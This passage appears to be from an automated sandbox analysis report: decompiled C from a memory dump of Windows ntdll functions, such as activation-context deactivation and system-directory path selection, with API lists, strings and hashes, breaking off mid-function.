                                                                                                                            0x6b231f05
                                                                                                                            0x6b231f08
                                                                                                                            0x6b231f0c
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b231f12
                                                                                                                            0x6b231f18
                                                                                                                            0x6b231f1b
                                                                                                                            0x6b231f1e
                                                                                                                            0x6b231f21
                                                                                                                            0x6b231f26
                                                                                                                            0x6b231f28
                                                                                                                            0x6b231f2d
                                                                                                                            0x6b231f2e
                                                                                                                            0x6b231f31
                                                                                                                            0x00000000
                                                                                                                            0x6b231f31
                                                                                                                            0x6b231ef7
                                                                                                                            0x6b1d6d56
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1d6d58
                                                                                                                            0x6b1d6d5c
                                                                                                                            0x6b1d6d61
                                                                                                                            0x6b1d6d64
                                                                                                                            0x6b1d6d76
                                                                                                                            0x6b1d6d7b
                                                                                                                            0x6b1d6d7e
                                                                                                                            0x00000000
                                                                                                                            0x6b1d6e1a
                                                                                                                            0x6b1d6e1a
                                                                                                                            0x6b1d6e1f
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1d6e2c
                                                                                                                            0x6b1d6e30
                                                                                                                            0x6b1d6e31
                                                                                                                            0x6b1d6e34
                                                                                                                            0x6b1d6e35
                                                                                                                            0x00000000
                                                                                                                            0x6b1d6e35
                                                                                                                            0x6b231f6f
                                                                                                                            0x6b231f74
                                                                                                                            0x6b231f77
                                                                                                                            0x6b231f7c
                                                                                                                            0x6b231f7d
                                                                                                                            0x6b231f81
                                                                                                                            0x6b231f82
                                                                                                                            0x6b231f85
                                                                                                                            0x00000000
                                                                                                                            0x6b231f85
                                                                                                                            0x6b1d6d64
                                                                                                                            0x6b1d6d9b
                                                                                                                            0x6b1d6d9d
                                                                                                                            0x6b1d6da2
                                                                                                                            0x6b231fcb
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b231fd1
                                                                                                                            0x6b231fd1
                                                                                                                            0x6b1d6daa
                                                                                                                            0x6b231fd7
                                                                                                                            0x6b231fdd
                                                                                                                            0x6b232047
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b23204d
                                                                                                                            0x6b232055
                                                                                                                            0x6b232059
                                                                                                                            0x6b23205b
                                                                                                                            0x6b23205d
                                                                                                                            0x6b232071
                                                                                                                            0x6b232078
                                                                                                                            0x6b232081
                                                                                                                            0x6b232086
                                                                                                                            0x00000000
                                                                                                                            0x6b232089
                                                                                                                            0x6b231fe1
                                                                                                                            0x6b23200d
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b23201f
                                                                                                                            0x6b232021
                                                                                                                            0x6b23202a
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b232039
                                                                                                                            0x6b23203c
                                                                                                                            0x6b23203f
                                                                                                                            0x6b23203f
                                                                                                                            0x00000000
                                                                                                                            0x6b23203f
                                                                                                                            0x6b231fe6
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b231ff2
                                                                                                                            0x6b231ff7
                                                                                                                            0x6b231ffe
                                                                                                                            0x6b232004
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • __isascii.1105(?,?,?,00000000,?,00000000,?,00000000), ref: 6B1D6D5C
                                                                                                                            • isdigit.1105(?,?,?,00000000,?,00000000,?,00000000), ref: 6B1D6D67
                                                                                                                            • __isascii.1105(?,?,?,00000000,?,00000000,?,00000000), ref: 6B1D6D76
                                                                                                                            • isxdigit.1105(?,?,?,00000000,?,00000000,?,00000000), ref: 6B1D6D81
                                                                                                                            • __isascii.1105(00000000,?,?,00000000,?,00000000,?,00000000), ref: 6B1D6DD4
                                                                                                                            • isdigit.1105(00000000,?,?,00000000,?,00000000,?,00000000), ref: 6B1D6DDF
                                                                                                                            • __isascii.1105(00000000,?,?,00000000,?,00000000,?,00000000), ref: 6B1D6DEA
                                                                                                                            • isxdigit.1105(00000000,?,?,00000000,?,00000000,?,00000000), ref: 6B1D6DF5
                                                                                                                            • strtol.1105(?,00000000,00000010,?,?,00000000,?,00000000,?,00000000), ref: 6B231F53
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: __isascii$isdigitisxdigit$strtol
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2731936382-0
                                                                                                                            • Opcode ID: ce4017a68cac62f16c561abc348bc20d924df1deea31378d96b57986fe07fbb5
                                                                                                                            • Instruction ID: 2bbb8815066568a242f7c61bce63b56d0484d1ca79c78e289abf9989ec080fa6
                                                                                                                            • Opcode Fuzzy Hash: ce4017a68cac62f16c561abc348bc20d924df1deea31378d96b57986fe07fbb5
                                                                                                                            • Instruction Fuzzy Hash: 44B1E675E4462EABDB04CF68D890BAFB7F5EF56305F108069D894EB384D7389A81C790
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D4360, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 144COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 37%
                                                                                                                            			E6B1D4360(signed int _a4, unsigned int _a8) {
				void* _v4;
				signed int _v8;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				intOrPtr _v76;
				signed int _v84;
				signed int _v88;
				char _v92;
				signed int _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t43;
				signed char _t46;
				signed int _t67;
				signed int _t69;
				void* _t70;
				signed int _t79;
				signed int _t82;
				signed int _t83;
				void* _t84;
				signed int _t85;
				void* _t86;
				signed int _t87;
				signed int _t89;

				_t89 = (_t87 & 0xfffffff8) - 0x5c;
				_t40 =  *0x6b2cd360 ^ _t89;
				_v8 =  *0x6b2cd360 ^ _t89;
				_push(_t85);
				if((_a4 & 0xfffffffe) != 0) {
					_push(_a4);
					_push("RtlDeactivateActivationContext");
					_push("SXS: %s() called with invalid flags 0x%08lx\n");
					L17:
					_push(0);
					_push(0x33);
					E6B265720();
					_t89 = _t89 + 0x14;
					L19:
					_push(0xc000000d);
					L21:
					L6B22DF30(_t71, _t80);
					L22:
					_t82 =  *_t85;
					_t71 = 0;
					if(_t82 == 0) {
						_t43 = 0;
					} else {
						asm("sbb eax, eax");
						_t43 =  ~( *(_t82 + 8) & 8) & _t82;
					}
					if(_t82 == 0) {
						L20:
						_push(0xc0150010);
						goto L21;
					} else {
						while(_t43 == 0 ||  *((intOrPtr*)(_t43 + 0xc)) != _t80) {
							_t82 =  *_t82;
							_t71 = _t71 + 1;
							if(_t82 == 0) {
								_t43 = 0;
							} else {
								asm("sbb eax, eax");
								_t43 =  ~( *(_t82 + 8) & 8) & _t82;
							}
							if(_t82 != 0) {
								continue;
							}
							break;
						}
						if(_t82 == 0) {
							goto L20;
						}
						_v84 = _v84 & 0x00000000;
						_v88 = _v88 & 0x00000000;
						_push( &_v92);
						_v76 = 3;
						_v72 = _t71;
						_v68 = _t82;
						_v64 = _t85;
						_v92 = 0xc015000f;
						E6B22DEF0(_t71, _t80);
						L8:
						_t83 =  *_t82;
						do {
							_t46 =  *(_t85 + 8);
							_t69 =  *_t85;
							if((_t46 & 0x00000001) != 0) {
								E6B209B10( *((intOrPtr*)(_t85 + 4)));
								_t46 =  *(_t85 + 8);
							}
							if((_t46 & 0x00000008) != 0) {
								_t80 = _t85;
								E6B1D4439(_v88, _t85);
							}
							_t85 = _t69;
						} while (_t69 != _t83);
						_t40 = _v88;
						 *_v88 = _t83;
						L14:
						_pop(_t84);
						_pop(_t86);
						_pop(_t70);
						return E6B21B640(_t40, _t70,  *(_t89 + 0x64) ^ _t89, _t80, _t84, _t86);
					}
				}
				_t80 = _a8;
				if(_t80 == 0) {
					goto L14;
				}
				if((_t80 & 0xf0000000) != 0x10000000) {
					_push(_t80);
					_push("RtlDeactivateActivationContext");
					_push("SXS: %s() called with invalid cookie type 0x%08Ix\n");
					goto L17;
				}
				_t85 = 0xfff;
				_t71 = _t80 >> 0x00000010 ^  *( *( *[fs:0x18] + 0x1a8) + 0x14);
				_t40 =  *( *[fs:0x18] + 0x1a8);
				if((0x00000fff & (_t80 >> 0x00000010 ^  *( *( *[fs:0x18] + 0x1a8) + 0x14))) != 0) {
					_push( *(_t40 + 0x14) & 0x00000fff);
					_push(_t80);
					E6B265720(0x33, 0, "SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix\n", "RtlDeactivateActivationContext");
					_t89 = _t89 + 0x18;
					goto L19;
				}
				_t85 =  *_t40;
				_v96 = _t40;
				if(_t85 == 0) {
					goto L14;
				}
				_t67 =  *(_t85 + 8) & 0x00000008;
				asm("sbb ecx, ecx");
				_t79 =  ~_t67 & _t85;
				if(_t67 == 0 ||  *((intOrPtr*)(_t79 + 0xc)) != _t80) {
					goto L22;
				} else {
					_t82 = _t85;
					goto L8;
				}
			}






























                                                                                                                            0x6b1d4368
                                                                                                                            0x6b1d4370
                                                                                                                            0x6b1d4372
                                                                                                                            0x6b1d437e
                                                                                                                            0x6b1d4380
                                                                                                                            0x6b23072a
                                                                                                                            0x6b23072d
                                                                                                                            0x6b230732
                                                                                                                            0x6b230744
                                                                                                                            0x6b230744
                                                                                                                            0x6b230746
                                                                                                                            0x6b230748
                                                                                                                            0x6b23074d
                                                                                                                            0x6b23076f
                                                                                                                            0x6b23076f
                                                                                                                            0x6b23077b
                                                                                                                            0x6b23077b
                                                                                                                            0x6b230780
                                                                                                                            0x6b230780
                                                                                                                            0x6b230782
                                                                                                                            0x6b230786
                                                                                                                            0x6b230798
                                                                                                                            0x6b230788
                                                                                                                            0x6b230792
                                                                                                                            0x6b230794
                                                                                                                            0x6b230794
                                                                                                                            0x6b23079c
                                                                                                                            0x6b230776
                                                                                                                            0x6b230776
                                                                                                                            0x00000000
                                                                                                                            0x6b23079e
                                                                                                                            0x6b23079e
                                                                                                                            0x6b2307a7
                                                                                                                            0x6b2307a9
                                                                                                                            0x6b2307ac
                                                                                                                            0x6b2307be
                                                                                                                            0x6b2307ae
                                                                                                                            0x6b2307b8
                                                                                                                            0x6b2307ba
                                                                                                                            0x6b2307ba
                                                                                                                            0x6b2307c2
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b2307c2
                                                                                                                            0x6b2307c6
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b2307c8
                                                                                                                            0x6b2307d1
                                                                                                                            0x6b2307d6
                                                                                                                            0x6b2307d7
                                                                                                                            0x6b2307df
                                                                                                                            0x6b2307e3
                                                                                                                            0x6b2307e7
                                                                                                                            0x6b2307eb
                                                                                                                            0x6b2307f3
                                                                                                                            0x6b1d43fb
                                                                                                                            0x6b1d43fb
                                                                                                                            0x6b1d43fd
                                                                                                                            0x6b1d43fd
                                                                                                                            0x6b1d4400
                                                                                                                            0x6b1d4404
                                                                                                                            0x6b230800
                                                                                                                            0x6b230805
                                                                                                                            0x6b230805
                                                                                                                            0x6b1d440c
                                                                                                                            0x6b1d4412
                                                                                                                            0x6b1d4414
                                                                                                                            0x6b1d4414
                                                                                                                            0x6b1d4419
                                                                                                                            0x6b1d441b
                                                                                                                            0x6b1d441f
                                                                                                                            0x6b1d4423
                                                                                                                            0x6b1d4425
                                                                                                                            0x6b1d4429
                                                                                                                            0x6b1d442a
                                                                                                                            0x6b1d442b
                                                                                                                            0x6b1d4436
                                                                                                                            0x6b1d4436
                                                                                                                            0x6b23079c
                                                                                                                            0x6b1d4386
                                                                                                                            0x6b1d438b
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1d439d
                                                                                                                            0x6b230739
                                                                                                                            0x6b23073a
                                                                                                                            0x6b23073f
                                                                                                                            0x00000000
                                                                                                                            0x6b23073f
                                                                                                                            0x6b1d43ae
                                                                                                                            0x6b1d43b9
                                                                                                                            0x6b1d43c2
                                                                                                                            0x6b1d43ca
                                                                                                                            0x6b230757
                                                                                                                            0x6b230758
                                                                                                                            0x6b230767
                                                                                                                            0x6b23076c
                                                                                                                            0x00000000
                                                                                                                            0x6b23076c
                                                                                                                            0x6b1d43d0
                                                                                                                            0x6b1d43d2
                                                                                                                            0x6b1d43d8
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1d43dd
                                                                                                                            0x6b1d43e4
                                                                                                                            0x6b1d43e6
                                                                                                                            0x6b1d43ea
                                                                                                                            0x00000000
                                                                                                                            0x6b1d43f9
                                                                                                                            0x6b1d43f9
                                                                                                                            0x00000000
                                                                                                                            0x6b1d43f9

                                                                                                                            APIs
                                                                                                                            • DbgPrintEx.1105(00000033,00000000,SXS: %s() called with invalid flags 0x%08lx,RtlDeactivateActivationContext,FFFFFFFE), ref: 6B230748
                                                                                                                            • DbgPrintEx.1105(00000033,00000000,SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix,RtlDeactivateActivationContext,?,?), ref: 6B230767
                                                                                                                            • RtlRaiseStatus.1105(C000000D), ref: 6B23077B
                                                                                                                            • RtlRaiseException.1105(?,?,?), ref: 6B2307F3
                                                                                                                            • RtlReleaseActivationContext.1105(?), ref: 6B230800
                                                                                                                            Strings
                                                                                                                            • SXS: %s() called with invalid flags 0x%08lx, xrefs: 6B230732
                                                                                                                            • RtlDeactivateActivationContext, xrefs: 6B23072D, 6B23073A, 6B230759
                                                                                                                            • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 6B23073F
                                                                                                                            • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 6B23075E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: PrintRaise$ActivationContextExceptionReleaseStatus
                                                                                                                            • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                            • API String ID: 1148088771-1245972979
                                                                                                                            • Opcode ID: e6cdb70ead6727a34639eff59d031e196fbc97f2e7c2c479dfdb47026a995116
                                                                                                                            • Instruction ID: dcd959022113d49d982db96310453d233129e0ec8578e14682e05e5293814c87
                                                                                                                            • Opcode Fuzzy Hash: e6cdb70ead6727a34639eff59d031e196fbc97f2e7c2c479dfdb47026a995116
                                                                                                                            • Instruction Fuzzy Hash: 1A4117B1654B16ABD315CF28C8C5B1773E1EF94B55F10855DF4A59B280DB3CE8008FA1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B215969, Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 101COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 49%
                                                                                                                            			E6B215969(void* __ecx) {
				intOrPtr _v8;
				void* _v12;
				short* _t29;
				intOrPtr _t32;
				signed int* _t37;
				signed int _t38;
				void* _t41;
				intOrPtr _t43;
				signed int** _t44;
				signed int* _t45;
				void _t47;
				intOrPtr* _t49;
				void* _t51;

				_push(__ecx);
				_push(__ecx);
				_t51 = __ecx;
				if(__ecx == 0) {
					E6B275100(__ecx, "Internal error check failed", "minkernel\\ntdll\\sxsisol.cpp", 0x20c, "This != NULL");
					_t47 = 0xc00000e5;
					L9:
					return _t47;
				}
				if( *((char*)(__ecx + 0x28)) == 0) {
					L7:
					_t47 = 0;
					L8:
					memset(_t51, 0, 0x2c);
					goto L9;
				}
				_t41 =  *(__ecx + 0x20);
				if(_t41 == 0 ||  *((intOrPtr*)(_t41 + 4)) == 0) {
					_t45 =  *(_t51 + 0x1c);
					if(_t45 != 0) {
						if(_t45[1] !=  *((intOrPtr*)(_t51 + 4))) {
							goto L5;
						}
						_t38 =  *_t51 & 0x0000ffff;
						if(_t38 > _t45[0]) {
							_push("rUS.Length <= This->PrivatePreallocatedString->MaximumLength");
							_push(0x219);
							goto L14;
						}
						 *_t45 = _t38;
						_t44 =  *(_t51 + 0x24);
						if(_t44 == 0) {
							goto L7;
						}
						_t37 =  *(_t51 + 0x1c);
						L19:
						 *_t44 = _t37;
						goto L7;
					}
					L5:
					if(_t41 == 0) {
						_t49 = _t51 + 8;
						if(_t49 != 0) {
							_t32 =  *_t49;
							if(_t32 != 0) {
								_t43 =  *((intOrPtr*)(_t51 + 0xc));
								if(_t32 != _t43) {
									_v8 = _t32;
									RtlFreeUnicodeString( &_v12);
									_t43 =  *((intOrPtr*)(_t51 + 0xc));
								}
								 *_t49 = _t43;
								 *((intOrPtr*)(_t51 + 0x10)) =  *((intOrPtr*)(_t51 + 0x14));
							}
						}
						_t29 =  *((intOrPtr*)(_t51 + 0xc));
						 *((intOrPtr*)(_t51 + 4)) = _t29;
						if(_t29 != 0) {
							 *_t29 = 0;
						}
						 *_t51 = 0;
						 *((short*)(_t51 + 2)) =  *((intOrPtr*)(_t51 + 0x14));
						goto L7;
					}
					 *_t41 =  *_t51;
					 *((intOrPtr*)(_t41 + 4)) =  *((intOrPtr*)(_t51 + 4));
					_t44 =  *(_t51 + 0x24);
					if(_t44 != 0) {
						_t37 =  *(_t51 + 0x20);
						goto L19;
					}
					goto L7;
				} else {
					_push("(This->PrivateDynamicallyAllocatedString == NULL) || (This->PrivateDynamicallyAllocatedString->Buffer == NULL)");
					_push(0x214);
					L14:
					_push("minkernel\\ntdll\\sxsisol.cpp");
					_push("Internal error check failed");
					E6B275100(_t41);
					_t47 = 0xc00000e5;
					goto L8;
				}
			}
















                                                                                                                            0x6b21596e
                                                                                                                            0x6b21596f
                                                                                                                            0x6b215971
                                                                                                                            0x6b215976
                                                                                                                            0x6b24f9b3
                                                                                                                            0x6b24f9b8
                                                                                                                            0x6b2159c6
                                                                                                                            0x6b2159cd
                                                                                                                            0x6b2159cd
                                                                                                                            0x6b215980
                                                                                                                            0x6b2159b7
                                                                                                                            0x6b2159b7
                                                                                                                            0x6b2159b9
                                                                                                                            0x6b2159be
                                                                                                                            0x00000000
                                                                                                                            0x6b2159c3
                                                                                                                            0x6b215982
                                                                                                                            0x6b215987
                                                                                                                            0x6b215993
                                                                                                                            0x6b215998
                                                                                                                            0x6b24f9f7
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b24f9fd
                                                                                                                            0x6b24fa04
                                                                                                                            0x6b24f9ce
                                                                                                                            0x6b24f9d3
                                                                                                                            0x00000000
                                                                                                                            0x6b24f9d3
                                                                                                                            0x6b24fa06
                                                                                                                            0x6b24fa09
                                                                                                                            0x6b24fa0e
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b24fa14
                                                                                                                            0x6b24fa17
                                                                                                                            0x6b24fa17
                                                                                                                            0x00000000
                                                                                                                            0x6b24fa17
                                                                                                                            0x6b21599e
                                                                                                                            0x6b2159a0
                                                                                                                            0x6b24fa1e
                                                                                                                            0x6b24fa23
                                                                                                                            0x6b24fa25
                                                                                                                            0x6b24fa29
                                                                                                                            0x6b24fa2b
                                                                                                                            0x6b24fa30
                                                                                                                            0x6b24fa32
                                                                                                                            0x6b24fa39
                                                                                                                            0x6b24fa3e
                                                                                                                            0x6b24fa3e
                                                                                                                            0x6b24fa44
                                                                                                                            0x6b24fa46
                                                                                                                            0x6b24fa46
                                                                                                                            0x6b24fa29
                                                                                                                            0x6b24fa49
                                                                                                                            0x6b24fa4c
                                                                                                                            0x6b24fa51
                                                                                                                            0x6b24fa55
                                                                                                                            0x6b24fa55
                                                                                                                            0x6b24fa5a
                                                                                                                            0x6b24fa61
                                                                                                                            0x00000000
                                                                                                                            0x6b24fa61
                                                                                                                            0x6b2159a8
                                                                                                                            0x6b2159ad
                                                                                                                            0x6b2159b0
                                                                                                                            0x6b2159b5
                                                                                                                            0x6b2159ce
                                                                                                                            0x00000000
                                                                                                                            0x6b2159ce
                                                                                                                            0x00000000
                                                                                                                            0x6b24f9c2
                                                                                                                            0x6b24f9c2
                                                                                                                            0x6b24f9c7
                                                                                                                            0x6b24f9d8
                                                                                                                            0x6b24f9d8
                                                                                                                            0x6b24f9dd
                                                                                                                            0x6b24f9e2
                                                                                                                            0x6b24f9e7
                                                                                                                            0x00000000
                                                                                                                            0x6b24f9e7

                                                                                                                            APIs
                                                                                                                            • memset.1105(?,00000000,0000002C,?,00000000,?,?,?,6B1F291C), ref: 6B2159BE
                                                                                                                            • RtlAssert.1105(Internal error check failed,minkernel\ntdll\sxsisol.cpp,0000020C,This != NULL,?,00000000,?,?,?,6B1F291C), ref: 6B24F9B3
                                                                                                                            • RtlAssert.1105(Internal error check failed,minkernel\ntdll\sxsisol.cpp,00000219,rUS.Length <= This->PrivatePreallocatedString->MaximumLength,?,00000000,?,?,?,6B1F291C), ref: 6B24F9E2
                                                                                                                            Strings
                                                                                                                            • This != NULL, xrefs: 6B24F99F
                                                                                                                            • Internal error check failed, xrefs: 6B24F9AE, 6B24F9DD
                                                                                                                            • rUS.Length <= This->PrivatePreallocatedString->MaximumLength, xrefs: 6B24F9CE
                                                                                                                            • minkernel\ntdll\sxsisol.cpp, xrefs: 6B24F9A9, 6B24F9D8
                                                                                                                            • (This->PrivateDynamicallyAllocatedString == NULL) || (This->PrivateDynamicallyAllocatedString->Buffer == NULL), xrefs: 6B24F9C2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Assert$memset
                                                                                                                            • String ID: (This->PrivateDynamicallyAllocatedString == NULL) || (This->PrivateDynamicallyAllocatedString->Buffer == NULL)$Internal error check failed$This != NULL$minkernel\ntdll\sxsisol.cpp$rUS.Length <= This->PrivatePreallocatedString->MaximumLength
                                                                                                                            • API String ID: 2494167153-3589341846
                                                                                                                            • Opcode ID: f6858b2351fa18846de3eb97770ba549443acb3e4b6c8111c65a84b30f9a30bb
                                                                                                                            • Instruction ID: ead7271460d98fae30ef1e306e4c1fc0fb09e50c87bbc6ea28dadc81d3467935
                                                                                                                            • Opcode Fuzzy Hash: f6858b2351fa18846de3eb97770ba549443acb3e4b6c8111c65a84b30f9a30bb
                                                                                                                            • Instruction Fuzzy Hash: 1031A17460570AEFE328CF29C484E17B3E0EF94715B10899DE99E97A80D738F841C7A6
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2119F0, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 42COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E6B2119F0(signed int __ecx, void* __edx, struct _EXCEPTION_RECORD _a4) {
				void* _t3;
				WCHAR* _t4;
				void* _t6;
				void* _t7;

				_t3 = (__ecx & 0x0000ffff) - 1;
				if(_t3 == 0) {
					_t4 = L"\\System32\\";
					if(__edx == 0) {
						_t4 = L"System32";
					}
					L4:
					RtlInitUnicodeString(_a4, _t4);
					return 0;
				}
				_t6 = _t3 - 0x14b;
				if(_t6 != 0) {
					_t7 = _t6 - 0x78;
					if(_t7 == 0) {
						if(__edx == 0) {
							_t4 = L"SysARM32";
						} else {
							_t4 = L"\\SysARM32\\";
						}
						goto L4;
					}
					if(_t7 == 0x38a0) {
						if(__edx == 0) {
							_t4 = L"SyCHPE32";
						} else {
							_t4 = L"\\SyCHPE32\\";
						}
						goto L4;
					}
					return 0xc000000d;
				} else {
					if(__edx != 0) {
						_t4 = L"\\SysWOW64\\";
					} else {
						_t4 = L"SysWOW64";
					}
					goto L4;
				}
			}







                                                                                                                            0x6b2119f8
                                                                                                                            0x6b2119fb
                                                                                                                            0x6b211a20
                                                                                                                            0x6b211a27
                                                                                                                            0x6b211a29
                                                                                                                            0x6b211a29
                                                                                                                            0x6b211a11
                                                                                                                            0x6b211a15
                                                                                                                            0x00000000
                                                                                                                            0x6b211a1a
                                                                                                                            0x6b2119fd
                                                                                                                            0x6b211a02
                                                                                                                            0x6b24d31c
                                                                                                                            0x6b24d31f
                                                                                                                            0x6b24d34c
                                                                                                                            0x6b24d358
                                                                                                                            0x6b24d34e
                                                                                                                            0x6b24d34e
                                                                                                                            0x6b24d34e
                                                                                                                            0x00000000
                                                                                                                            0x6b24d34c
                                                                                                                            0x6b24d326
                                                                                                                            0x6b24d334
                                                                                                                            0x6b24d340
                                                                                                                            0x6b24d336
                                                                                                                            0x6b24d336
                                                                                                                            0x6b24d336
                                                                                                                            0x00000000
                                                                                                                            0x6b24d334
                                                                                                                            0x00000000
                                                                                                                            0x6b211a08
                                                                                                                            0x6b211a0a
                                                                                                                            0x6b211a30
                                                                                                                            0x6b211a0c
                                                                                                                            0x6b211a0c
                                                                                                                            0x6b211a0c
                                                                                                                            0x00000000
                                                                                                                            0x6b211a0a

                                                                                                                            APIs
                                                                                                                            • RtlInitUnicodeString.1105(?,\System32\,?,6B2119C0,?,?,\SysWOW64,02140000,00000000,?,?), ref: 6B211A15
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: InitStringUnicode
                                                                                                                            • String ID: SyCHPE32$SysARM32$SysWOW64$System32$\SyCHPE32\$\SysARM32\$\SysWOW64\$\System32\
                                                                                                                            • API String ID: 4228678080-2516413534
                                                                                                                            • Opcode ID: 9e2299b8a089c22eeed963a05b75f309e3a197cd9ff9969451ed35d0d311e86d
                                                                                                                            • Instruction ID: bea39514bba33ca691dd345da71b086988ffb43c8f87115275801f0de94cf096
                                                                                                                            • Opcode Fuzzy Hash: 9e2299b8a089c22eeed963a05b75f309e3a197cd9ff9969451ed35d0d311e86d
                                                                                                                            • Instruction Fuzzy Hash: 02F096112ED11E665350413C9AC0AD7AEC65B327C3B4000A2AE00FFA84D23FDD95C643
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D0BD0, Relevance: 15.3, APIs: 10, Instructions: 272COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E6B1D0BD0(wchar_t* _a4, wchar_t** _a8, intOrPtr _a12) {
				char _v5;
				wchar_t* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				wchar_t* _v28;
				signed int _v32;
				long _t110;
				wchar_t** _t113;
				wchar_t* _t114;
				wchar_t* _t115;
				long _t116;
				long _t117;
				signed int _t118;
				int _t121;
				int _t122;
				void* _t123;
				wchar_t** _t126;
				int _t127;
				int _t128;
				wchar_t** _t129;
				signed int _t130;
				wchar_t* _t134;
				char _t135;
				wchar_t** _t138;
				char _t141;
				wchar_t** _t144;
				intOrPtr _t145;
				wchar_t* _t146;
				signed int _t147;
				long _t150;
				wchar_t** _t151;
				void* _t153;
				intOrPtr _t154;
				wchar_t* _t155;
				void* _t157;

				_t146 = _a4;
				_t144 = 0;
				_t129 = 0;
				_v20 = 0;
				_v28 = 0;
				_v5 = 0;
				_t150 =  *_t146 & 0x0000ffff;
				_v12 = 0;
				_v16 = 0;
				_v32 = 0;
				_v24 = 0;
				if(_t150 == 0) {
					_t134 = 0;
					L10:
					_t151 = _v20;
					 *_a8 = _t146;
					if(_t151 != 0) {
						if(_t151 != 3) {
							L13:
							return 0xc000000d;
						}
						_t134 = _t134 + 1;
						_v12 = _t134;
					}
					_t147 = _v32;
					if(_t147 != 0 || _t134 == 7) {
						if(_t129 != 1) {
							if(_t129 != 2) {
								goto L13;
							}
							_t145 = _a12;
							 *((short*)(_t145 + _v24 * 2)) = 0;
							L68:
							if(_t147 != 0) {
								_t153 = _t145 + _t147 * 2;
								_t89 = _t145 + 0x10; // 0x10
